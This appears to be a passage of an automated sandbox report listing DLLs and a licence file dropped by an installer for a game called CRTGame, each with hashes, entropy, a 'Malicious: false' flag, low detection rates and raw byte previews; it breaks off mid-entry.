Preview:	MZ......................@...................................D.... ..PE..L....r.[...........!....U....D............... ............................... ............@.........................P...........d............................N..........................................................8............................................@..................@..@.rsrc................B..............@..@.......................................@petite..U.......U....F..............`..`.....................................5....`K...=1.;;..s}....3500.z.<..]goR.lVO..C..j...........O......9#f.S.$1.b.D.8...VX....sb .A.%I......B.........R...Z5.............y......_W.0.!..T..nT.V..J..s.1`..V...Cb.2x0......0B...4...D.`...!.>[7..^;w'.u"W/...).P.m...P.......qF<.~1..T.>F.F.Rr.`...N....3$...w.L..P..SQP]C^.....2...%5.v...3.a`.k....q.0.o..A......k.....B..P.h.fy..jyb...<t$.%c-...<9.1#2.7./0.j.o#~...,!fuJ.M..a...(...0@.........,..t.3d"qva....fm.=.....]....s...z}-X..3................y>.!......g..E

C:\Program Files (x86)\CRTGame\bin\x86\bass_fx.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	34392
Entropy (8bit):	7.81689943223162
Encrypted:	false
SSDEEP:	768:mYBs3O9YL558R6R8P8W2rjQZQtfTIxRYsetoPNvPWIl+syr:vsUY15mqzW2u8rIxisFcJr
MD5:	EA245B00B9D27EF2BD96548A50A9CC2C
SHA1:	8463FDCDD5CED10C519EE0B406408AE55368E094
SHA-256:	4824A06B819CBE49C485D68A9802D9DAE3E3C54D4C2D8B706C8A87B56CEEFBF3
SHA-512:	EF1E107571402925AB5B1D9B096D7CEFF39C1245A23692A3976164D0DE0314F726CCA0CB10246FE58A13618FD5629A92025628373B3264153FC1D79B0415D9A7
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ph..4...4...4.......0...[...0...[...6...4.......V...0...`*..........5....)......Rich4...........................PE..L.....T...........!................6 .......................................0......................................D#..y....!..d.......X............................................................................................................................z..................`....rsrc...........X...................@..@....................................`...petite....... ......................`...................................................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\CRTGame\bin\x86\bass_ofr.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	5960
Entropy (8bit):	5.956401374574174
Encrypted:	false
SSDEEP:	96:dj78cqhzbWKlECE7WbjDFf6IhaYYUOAoDf4+XCVhovG9AkM7Ui10:CjlEJ7WbjDFf6waYvdc4gYAkM10
MD5:	B3CC560AC7A5D1D266CB54E9A5A4767E
SHA1:	E169E924405C2114022674256AFC28FE493FBFDF
SHA-256:	EDDE733A8D2CA65C8B4865525290E55B703530C954F001E68D1B76B2A54EDCB5
SHA-512:	A836DECACB42CC3F7D42E2BF7A482AE066F5D1DF08CCCC466880391028059516847E1BF71E4C6A90D2D34016519D16981DDEEACFB94E166E4A9A720D9CC5D699
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...................................D.... ..PE..L......I...........!.....4...T......6`....... ...............................p......................................lc.......a.......@..H....................................................................................................................0..........................`....rsrc........@..H...................@..@.............P......................@................`......................`.......................................X....E......j...f.!.PRj.....j..S.ERROR!.Corrupt Data!...`..f.`P....h....j..P..C.h.....<$.3f....t...;S.^......Vj.PWj.j.Vj.PW....Y.Yf..X........X....................Z...t..$.4..l$..m..J...R...z.....XXXXZt.D$....P(......P...s.j.h`...h`.....j.h....h....j.3.3.0_.K~..[...s.3..^......s...$A."...L$..<.........;D$....;D$......$. ............u...........V+.48.^...u.........A............r..I.e...h....P..0................0..............h.... ..0...........6...........k...........

C:\Program Files (x86)\CRTGame\bin\x86\bass_tta.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	7910
Entropy (8bit):	6.931925007191986
Encrypted:	false
SSDEEP:	192:piDl1jKrGer007ia6abHX0d/aeHeN+VPHIJQxNiJCl9AK0f:IDJ9aDb30dCe+4PHIJrJCl9AK0f
MD5:	1268DEA570A7511FDC8E70C1149F6743
SHA1:	1D646FC69145EC6A4C0C9CAD80626AD40F22E8CD
SHA-256:	F266DBA7B23321BF963C8D8B1257A50E1467FAAAB9952EF7FFED1B6844616649
SHA-512:	E19F0EA39FF7AA11830AF5AAD53343288C742BE22299C815C84D24251FA2643B1E0401AF04E5F9B25CAB29601EA56783522DDB06C4195C6A609804880BAE9E9B
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Preview:	MZ......................@...................................D.... ..PE..L.....V...........!.................p.......0............................................@.........................Pr.......q..d....P.......................%.......................................................q..8....................................@..........................@..@.rsrc........P......................@..@.............`.........................@petite.......p......................`..`.........................................\|7{M..... ........r B`.Zr..P.........T}.e..YJ...=.X..q.}......b.I...G.....^.d...R..-R.....d_.......K.q.H.A=.-S..,_.....L...........2.............u.u.%...:.q....c.[.....`...\.X..8..B.@L..3.7.q.....)!.- ...D.....p...J...RU..Q.A..[.#&..R.....".+4...px/7..\....4...., ..8...5.hV.>] ....3.-.<..I+.<r..T..H,Q..!..i--..+.Zq.[...H... ...N.8..#...a.x.iU.G..-_..R....Z(cT%.....S.P.U:g?...;....&....@..KI.X.Q..PQ..v..*....{..~..}..f....c..`....Q...q..%......,j.4.Y..)....Cf7..

C:\Program Files (x86)\CRTGame\bin\x86\bassalac.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	11532
Entropy (8bit):	7.219753259626605
Encrypted:	false
SSDEEP:	192:Dqv1jf+0vAe7Dl+JTGxuK5Rbfh70Il9MWbzq6UWkE0FGemexbiJi8TK0Q2:m9KIAeNgTGxu2Jfh1DMSzqKkvFGLJi85
MD5:	073F34B193F0831B3DD86313D74F1D2A
SHA1:	3DF5592532619C5D9B93B04AC8DBCEC062C6DD09
SHA-256:	C5EEC9CD18A344227374F2BC1A0D2CE2F1797CFFD404A0A28CF85439D15941E9
SHA-512:	EEFD583D1F213E5A5607C2CFBAED39E07AEC270B184E61A1BA0B5EF67ED7AC5518B5C77345CA9BD4F39D2C86FCD261021568ED14945E7A7541ADF78E18E64B0C
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Preview:	MZ......................@...................................D.... ..PE..L.....V...........!.........(...............P............................................@.........................P...........d....p..8...................82.........................................................8....................................`.......$..................@..@.rsrc........p.......&..............@..@.......................................@petite.............................`..`....................................#..L....y......"......O/..M...C.A.&:.e.i..l....CP...g.AK..S;.lf.?.g....].k.U.G.Y.J.",......%....:ge.D x.P }}..Tih.g......%G.Iy.j...\...S...s..$..........o..y..........,.........-..X.....v.M1..'...5R.4..8k!..q.=BVST<..M.E.._T.p...K.r....C.HEO....\..%%,I....>'.L.ct..{..I..l.Y#f Tk...:bH?.....G..Y.p..Q.....z/R.h>8....]S.....p.c/.m..6tc.d..(..{...=w4.w.^..d.....^..Tp.....Z..).Z."...&.-...o...xD+0.L+!...X.%?)+.P..Z.......P..F..P.".._.%9.^T;(..Y.>.. .....re

C:\Program Files (x86)\CRTGame\bin\x86\bassape.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	39304
Entropy (8bit):	7.819409739152795
Encrypted:	false
SSDEEP:	768:i5GGx+OZPWuGdoiwUpPLH7IN3x1eW0kIAJbfT13MMnahRlmftuohQf:i5DxDPWMApPLsNhkVkI6R3TnalauoQ
MD5:	C7A50ACE28DDE05B897E000FA398BBCE
SHA1:	33DA507B06614F890D8C8239E71D3D1372E61DAA
SHA-256:	F02979610F9BE2F267AA3260BB3DF0F79EEEB6F491A77EBBE719A44814602BCC
SHA-512:	4CD7F851C7778C99AFED492A040597356F1596BD81548C803C45565975CA6F075D61BC497FCE68C6B4FEDC1D0B5FD0D84FEAA187DC5E149F4E8E44492D999358
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....."b...........!.........x.......P.......................................`.......Z....@.........................PR.......Q..d....0..0............}......D........................................................Q..8.................................... .......t..................@..@.rsrc.... ...0.......v..............@..@petite.......P.......z..............`..`......................p..k..K..i{..\.H..'.\|w.t...\..dkB%..i.cX...`B...m.X..A.NU.i.I. J.I....x-.e2n.IA.2.:..2G5Z/.+(8w.S<...`ML........!..%+.r.s.1.~.D...]......U..q3.....9..?y.>j.E.T...Y..D..>..aJ......P^Y..w?.9w.,...+C^.[....\|..'.....7..F%..A.....)..b.)8.2Q`.v.F=.."S..{z...z-H=....L_....RM..s......H2P1a....[..i. 2..~.?...+R... .m(.I..X...H.g.Z..i..G.?.(......e.:.B......fh......gl.x.Z......I>..#....Hgv.;g.@ l.$(...0.........l.>.p..z;A.@...*4v..x.U.gU..Bqqb..6.x...D.....cIE(5m.g}J..

C:\Program Files (x86)\CRTGame\bin\x86\basscd.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18966
Entropy (8bit):	7.620111275837424
Encrypted:	false
SSDEEP:	384:gOKwxnw6OVDU839fgRgFMkucNauTT80CyTIz2bGjqXOK0Jo:gOHwBDUOe2McQkI0Cyo2Q/o
MD5:	F0F973781B6A66ADF354B04A36C5E944
SHA1:	8E8EE3A18D4CEC163AF8756E1644DF41C747EDC7
SHA-256:	04AB613C895B35044AF8A9A98A372A5769C80245CC9D6BF710A94C5BC42FA1B3
SHA-512:	118D5DACC2379913B725BD338F8445016F5A0D1987283B082D37C1D1C76200240E8C79660E980F05E13E4EB79BDA02256EAC52385DAA557C6E0C5D326D43A835
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Preview:	MZ......................@...................................D.... ..PE..L...9#.]...........!.........B...............p............................................@.....................................x.......@....................M..........................................................@............................................>..................@..@.rsrc................@..............@..@.......................................@petite...............D..............`..`....................................g5 ....S%,_ .]/.0$R.yB..."@...N.AGG.^.?...1.........&?....v....6.0.. ME..(..gh\jv#.l..#$.Z&...._\`.@.......D.;.C~..m}3..\>.h..@.;.f Tho...(xVs..m.c..F..SS.C...z[....z...... .X.&....HY,...o.d..jP.nr..@.)..W.1#...b..Q.*E8.B..N5.....].........7..A..2c.M.q.O0(.Gi..B.....CT.(..+....>@T j.#!..."..P.u.3..5.Q0K..p....ERvG..._'...ir%m...NT.v:.....g.....8.+....m....8..Z.=.B.......D_..ln...C.......p8...e."...U...+.f..E.=X.j.DeD.X_.Y..n.r.!xWu..\.VB.......`.F.A....dx...

C:\Program Files (x86)\CRTGame\bin\x86\bassdsd.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	8456
Entropy (8bit):	6.767152008521429
Encrypted:	false
SSDEEP:	192:yxPHUtfhriUVoSoGtyo2xmJ8GbarAtT7/lxjFZnPK0cl:KPehriU3t2IiGbHTxZnPK0cl
MD5:	19E08B7F7B379A9D1F370E2B5CC622BD
SHA1:	3E2D2767459A92B557380C5796190DB15EC8A6EA
SHA-256:	AC97E5492A3CE1689A2B3C25D588FAC68DFF5C2B79FCF4067F2D781F092BA2A1
SHA-512:	564101A9428A053AA5B08E84586BCBB73874131154010A601FCE8A6FC8C4850C614B4B0A07ACF2A38FD2D4924D835584DB0A8B49EF369E2E450E458AC32CF256
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...................................D.... ..PE..L...#.MZ...........!.................p.......0............................................@.........................Pr.......q..d....P..8....................%.......................................................q..8....................................@..........................@..@.rsrc........P......................@..@.............`.........................@petite.......p......................`..`..................................................l..a.......1...3W..Z.....H...5.(...$.. .>X9..Fn... ..."j1..........%.7.d...".m...n.ePY......`....I.gYo..UC....Rq(...F......s..8`.I.....i..F.....'......@..-;.........J...Oq...b@...........$.D4E..($.....8':;.q....[-..{..w....@M....J$..0d..9Q.I^.^y.E..L_-.x!s.......W.H.R..@.6....MQ.Q8.s.."...!."IX.vM...!e.$%......U.....F.CoI..X.dA...0.Y..r.8.*p...<..M y...8..s....N5<.J....&..`...w..'..\s..%..A.`....s..j.H...X#..R.\..)R3@..X.P.5...G..t.f/..C.b.d...\|.

C:\Program Files (x86)\CRTGame\bin\x86\bassflac.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	36752
Entropy (8bit):	7.780431937344781
Encrypted:	false
SSDEEP:	768:E7epCl6I8YbTvEKXQ2vm+iocmmMt7KjuDnlVahRlmftuY5B:EepUv8aZvmd+7nDDalauy
MD5:	9FF783BB73F8868FA6599CDE65ED21D7
SHA1:	F515F91D62D36DC64ADAA06FA0EF6CF769376BDF
SHA-256:	E0234AF5F71592C472439536E710BA8105D62DFA68722965DF87FED50BAB1816
SHA-512:	C9D3C3502601026B6D55A91C583E0BB607BFC695409B984C0561D0CBE7D4F8BD231BC614E0EC1621C287BF0F207017D3E041694320E692FF00BC2220BFA26C26
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......b...........!.........n.......................................................B....@.........................P...........d.......@............s.......x..........................................................8............................................j..................@..@.rsrc.... ...........l..............@..@petite...............p..............`..`..................8..u...I.x\|}...g{...@..ffe.c4.-.Bj..........U.J.`..s.N:`..I@;..B.kbmj..E%2. `....".]&.&.).BB...E..4u'.....Q.......%....V.............5...y....E..q<w.....j...B..O...p.....X...m...= .X..........4........~~.8.F@.V...6....;?.5..)S.m.9U......^.zO!1o.F.E. ...H=`2...9.(...4).E.!G..;R.1.#.h0..(..t8..O...Td.d..~...l.a..U...b<../..W....M6...U*G..II.x........>..I[...v.N/.V..3..Y.c...Zh.i..i.....n....M..D....5o."....(.9.+..z...._$t.T...X#\...N....Q%...>U..\|....J

C:\Program Files (x86)\CRTGame\bin\x86\bassmidi.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	36416
Entropy (8bit):	7.842278356440954
Encrypted:	false
SSDEEP:	768:lshkyPXvH6bPACtmb8boNQdVfCXewki/OvXEApOqmFfSq1oIQMW:lsh3n5Pb8boOdVCuwNEXEAonfSq1JQb
MD5:	BEBA64522AA8265751187E38D1FC0653
SHA1:	63FFB566AA7B2242FCC91A67E0EDA940C4596E8E
SHA-256:	8C58BC6C89772D0CD72C61E6CF982A3F51DEE9AAC946E076A0273CD3AAF3BE9D
SHA-512:	13214E191C6D94DB914835577C048ADF2240C7335C0A2C2274C096114B7B75CD2CE13A76316963CCD55EE371631998FAC678FCF82AE2AE178B7813B2C35C6651
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...................................D.... ..PE..L....}.Q...........!................6 ............`..........................0......................................d#.......!..........@...................t...........................................................................................................................`....rsrc...........@...................@..@....................................@................ ......................`.......................................X...{.......j...f.!.PRj.....j..S.ERROR!.Corrupt Data!... c.f.`P....h.p..j..P..C.h..`..<$.3f....t...;S.^......Vj.PWj.j.Vj.PW....Y.Yf..X........X....................Z...t..$.4..l$..m..J...R...z.....XXXXZt.D$....P(......P...s.j.h`...h`.....j.h....h....j.3.3.0_.K~..[...s.3..^......s...$A."...L$..<.........;D$....;D$......$. ............u...........V+.48.^...u.........A............r..I.....................]...............'..................................A...%...........

C:\Program Files (x86)\CRTGame\bin\x86\bassmix.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19008
Entropy (8bit):	7.672481244971812
Encrypted:	false
SSDEEP:	384:dz7otnjFa4ECX3yeGjA+tSXGnUav92hca+XWRlsuG+is:po7GU+szS3W7sQ7
MD5:	8EE91149989D50DFCF9DAD00DF87C9B0
SHA1:	E5581E6C1334A78E493539F8EA1CE585C9FFAF89
SHA-256:	3030E22F4A854E11A8AA2128991E4867CA1DF33BC7B9AFF76A5E6DEEF56927F6
SHA-512:	FA04E8524DA444DD91E4BD682CC9ADEE445259E0C6190A7DEF82B8C4478A78AAA8049337079AD01F7984DBA28316D72445A0F0D876F268A062AD9B8FF2A6E58D
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...................................D.... ..PE..L....+vS...........!....6...6.......6........p......................................................................0..........P.......@...................tM.......................................................................................................>..................`....rsrc...........@....H..............@..@....................................@...........6...........................`.......................................D...n'......j...f.!.PRj.....j..S.ERROR!.Corrupt Data!......f.`P....h.5..j..P..C.h.....<$.3f....t...;S.^......Vj.PWj.j.Vj.PW....Y.Yf..X........X............f.......Z...t..$.4..l$..m..J...R...z.....XXXXZt.D$....P(......P...s.j.h`...h`.....j.h....h....j.3.3.0_.K~..[...s.3..^......s...$A."...L$..<.........;D$....;D$......$. ............u...........V+.48.^...u.........A............r..I..K..........(...\|...}K...................E..K....p..j...g........Q..........y...........

C:\Program Files (x86)\CRTGame\bin\x86\bassopus.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	68876
Entropy (8bit):	7.922125376804506
Encrypted:	false
SSDEEP:	1536:q0Z4sz1ZMjCjDIhoLffiedENahBzzxO/JfgmYFGKEvi8TxCI+vHVl:v4MzMjGkhoLfsahS/JYN2vUl
MD5:	4E35BA785CD3B37A3702E577510F39E3
SHA1:	A2FD74A68BEFF732E5F3CB0835713AEA8D639902
SHA-256:	0AFE688B6FCA94C69780F454BE65E12D616C6E6376E80C5B3835E3FA6DE3EB8A
SHA-512:	1B839AF5B4049A20D9B8A0779FE943A4238C8FBFBF306BC6D3A27AF45C76F6C56B57B2EC8F087F7034D89B5B139E53A626A8D7316BE1374EAC28B06D23E7995D
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Preview:	MZ......................@...................................D.... ..PE..L.....U]...........!......................... ............................................@.........................P...........d.......@...............................................................................8...............................................................@..@.rsrc...............................@..@.......................................@petite..............................`..`...........................................&MK#H..OEJ..}??...:..$ayf.r7.w(/.d`...A(7.%p.f.>\..d."..W......[4.0..ZY..... .....~...T....9a+..'.......g!.....l...<..?Y.(..[k.I=....D.....c..=.?.8...D>0...#.ZdO..Z...%......X.P..bS..s..=$...m.N........A......A4..J>Wa.N..K.>....2n8.ii.#....y#.J ....i!...a7..Pbl@B.%h0..8RSr.........]..z.\...x..e..5.3.$h. <G.3....-......Q....O0..,......Y}......@...<...t.H).T..! .....ap......Tj.o...0b...`..yX.. g...hzA...b.7.s$M.... ..'....\$...H.\.l.C g..4..(.6@.Q....B(..

C:\Program Files (x86)\CRTGame\bin\x86\basswma.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	17472
Entropy (8bit):	7.524548435291935
Encrypted:	false
SSDEEP:	384:IwwsQD13cT5HhSVeEQNW5kbbcGEh/qTio+lyTnGy:QRD13ySVeEOW5kbSSTHNTnr
MD5:	7B52BE6D702AA590DB57A0E135F81C45
SHA1:	518FB84C77E547DD73C335D2090A35537111F837
SHA-256:	9B5A8B323D2D1209A5696EAF521669886F028CE1ECDBB49D1610C09A22746330
SHA-512:	79C1959A689BDC29B63CA771F7E1AB6FF960552CADF0644A7C25C31775FE3458884821A0130B1BAB425C3B41F1C680D4776DD5311CE3939775A39143C873A6FE
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...................................D.... ..PE..L....^.L...........!....%v..%.......6........`......................................................................h..................@....................F...............................................................................................p.......8..................`....rsrc...........@....B..............@..@....................................@...........%...........................`.......................................X...x..0....j...f.!.PRj.....j..S.ERROR!.Corrupt Data!......f.`P....h.,..j..P..C.h.....<$.3f....t...;S.^......Vj.PWj.j.Vj.PW....Y.Yf..X........X....................Z...t..$.4..l$..m..J...R...z.....XXXXZt.D$....P(......P...s.j.h`...h`.....j.h....h....j.3.3.0_.K~..[...s.3..^......s...$A."...L$..<.........;D$....;D$......$. ............u...........V+.48.^...u.........A............r..I..D..%...........\|...CC.......p......n....<.......`..............lH......)...............

C:\Program Files (x86)\CRTGame\bin\x86\basswv.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	35588
Entropy (8bit):	7.817557274117395
Encrypted:	false
SSDEEP:	768:dCrMZHv56WRldhmLjQDrbfc8cznHvc6modHQ:sAR0LzHvc6m2HQ
MD5:	58521D1AC2C588B85642354F6C0C7812
SHA1:	5912D2507F78C18D5DC567B2FA8D5AE305345972
SHA-256:	452EEE1E4EF2FE2E00060113CCE206E90986E2807BB966019AC4E9DEB303A9BD
SHA-512:	3988B61F6B633718DE36C0669101E438E70A17E3962A5C3A519BDECC3942201BA9C3B3F94515898BB2F8354338BA202A801B22129FC6D56598103B13364748C1
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Preview:	MZ......................@...................................D.... ..PE..L.....yX...........!.................@.......................................P............@.........................PB.......A..d.... ..@...................P........................................................A..8...............................................................@..@.rsrc........ ......................@..@.............0.........................@petite.......@......................`..`...................................._3.....g.ge..7t...R-_.R.@c.S.\..J?L.EZ.,....=H8..;.QJ.....P-)eFs93:.^...f......}..?...e...SD.......-.u.......q2...P...6..z5.T.S..P..Q....@..Mq.>....8" F...,..FE...S.[U..c......jr....b...-%...`......w..+W.C......]..#......LS....W.Y....o.8...i.[)..%(.2.t...YY .bL.....b.@&J,?l.........$..F..&...a#.\[".^...&]co....K.>...xQzw..XW.uT..+dm.o.b...@c....3..r....@]...P........{C/.....A!.&..........'....._..."S..&..F.......:.dxtK.6...7.I...Q..Nm2.....NX..fG..L..7.?..".(

C:\Program Files (x86)\CRTGame\bin\x86\copying (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp
File Type:	Unicode text, UTF-8 text
Category:	dropped
Size (bytes):	1059
Entropy (8bit):	5.1208137218866945
Encrypted:	false
SSDEEP:	24:LLDrmJHHH0yN3gtsHw1hj9QHOsUv4eOk4/+/m3oqLF5n:LLDaJHlxE35QHOs5exm3ogF5n
MD5:	B7EDCC6CB01ACE25EBD2555CF15473DC
SHA1:	2627FF03833F74ED51A7F43C55D30B249B6A0707
SHA-256:	D6B4754BB67BDD08B97D5D11B2D7434997A371585A78FE77007149DF3AF8D09C
SHA-512:	962BD5C9FB510D57FAC0C3B189B7ADEB29E00BED60F0BB9D7E899601C06C2263EDA976E64C352E4B7C0AAEFB70D2FCB0ABEF45E43882089477881A303EB88C09
Malicious:	false
Preview:	Copyright (c) 2011 Jan Kokem.ller..Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to deal.in the Software without restriction, including without limitation the rights.to use, copy, modify, merge, publish, distribute, sublicense, and/or sell.copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in.all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,.OUT OF OR IN CONNECTION WITH

C:\Program Files (x86)\CRTGame\bin\x86\d_writer.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	16910
Entropy (8bit):	5.289608933932413
Encrypted:	false
SSDEEP:	384:ohtyjknGC7hipL+9mLYFOozxkdlDNUwS5Qq:UGknGC74l+MUFI7C
MD5:	2F040608E68E679DD42B7D8D3FCA563E
SHA1:	4B2C3A6B8902E32CDA33A241B24A79BE380C55FC
SHA-256:	6B980CADC3E7047CC51AD1234CB7E76FF520149A746CB64E5631AF1EA1939962
SHA-512:	718AF5BE259973732179ABA45B672637FCA21AE575B4115A62139A751C04F267F355B8F7F7432B56719D91390DABA774B39283CBCFE18F09CA033389FB31A4FC
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........B.........#.........>...f...........0.....h......................... ................ .........................{.......\|...............................$...........................pA.......................................................text...4...........................`.P`.data...<....0......."..............@.0..rdata.......@.......$..............@.`@/4...........P.......(..............@.0@.bss.....d...`........................`..edata..{............2..............@.0@.idata..\|............4..............@.0..CRT....,............:..............@.0..tls.................<..............@.0..reloc..$............>..............@.0B................................................................................................................................................................................................................................

C:\Program Files (x86)\CRTGame\bin\x86\da.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	15374
Entropy (8bit):	5.192037544202194
Encrypted:	false
SSDEEP:	384:lhgkOI7BGi9gKV6uq+u6JewsNhNXUwSCgQ:DT7BGVKPKbXF
MD5:	BEFD36FE8383549246E1FD49DB270C07
SHA1:	1EF12B568599F31292879A8581F6CD0279F3E92A
SHA-256:	B5942E8096C95118C425B30CEC8838904897CDEF78297C7BBB96D7E2D45EE288
SHA-512:	FD9AA6A4134858A715BE846841827196382D0D86F2B1AA5C7A249B770408815B0FE30C4D1E634E8D6D3C8FEDBCE4654CD5DC240F91D54FC8A7EFE7CAE2E569F4
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........<.........#.........8...............0.....f................................b......... ......................p..E.......h...........................................................P@......................................................text...............................`.P`.data...,....0....... ..............@.0..rdata.......@......."..............@.0@/4...........P.......$..............@.0@.bss.........`........................`..edata..E....p......................@.0@.idata..h............0..............@.0..CRT....,............6..............@.0..tls.................8..............@.0..reloc...............:..............@.0B................................................................................................................................................................................................................................

C:\Program Files (x86)\CRTGame\bin\x86\daiso.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	197646
Entropy (8bit):	6.1570532273946625
Encrypted:	false
SSDEEP:	3072:brPGp0y4SP+iBGgySYm+dE3sYrJqkAzhU88vsAGSW+:brPGaTEsHSYmbbOU8osAGG
MD5:	2C8EC61630F8AA6AAC674E4C63F4C973
SHA1:	64E3BB9AA505C66E87FE912D4EA3054ADF6CEF76
SHA-256:	DFD55D0DDD1A7D081FCE8E552DC29706A84DC6CA2FDD2F82D63F33D74E882849
SHA-512:	488378012FB5F477ED4636C37D7A883B1DAD0FBC671D238B577A9374EFE40AB781F5E483AE921F1909A9B7C1C2A3E78E29B533D3B6FFE15AAEE840CAD2DCF5D0
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#...............................m................................]_........ ...................... ..A....0...............................`..............................p0.......................1..D............................text...............................`.P`.data...............................@.0..rdata..L0.......2..................@.`@/4...........P......................@.0@.bss..................................`..edata..A.... ......................@.0@.idata.......0......................@.0..CRT....,....@......................@.0..tls.........P......................@.0..reloc.......`......................@.0B................................................................................................................................................................................................................................

C:\Program Files (x86)\CRTGame\bin\x86\dsd2.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I3UF4.tmp\wG1fFAzGfH.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	31936
Entropy (8bit):	6.6461204214578
Encrypted:	false
SSDEEP:	768:SEEn30ilOAb++HynTDbc3fwaVCPxWE/MM:SEa0YOU1HgU3fwaVCPxqM
MD5:	72E3BDD0CE0AF6A3A3C82F3AE6426814
SHA1:	A2FB64D5B9F5F3181D1A622D918262CE2F9A7AA3
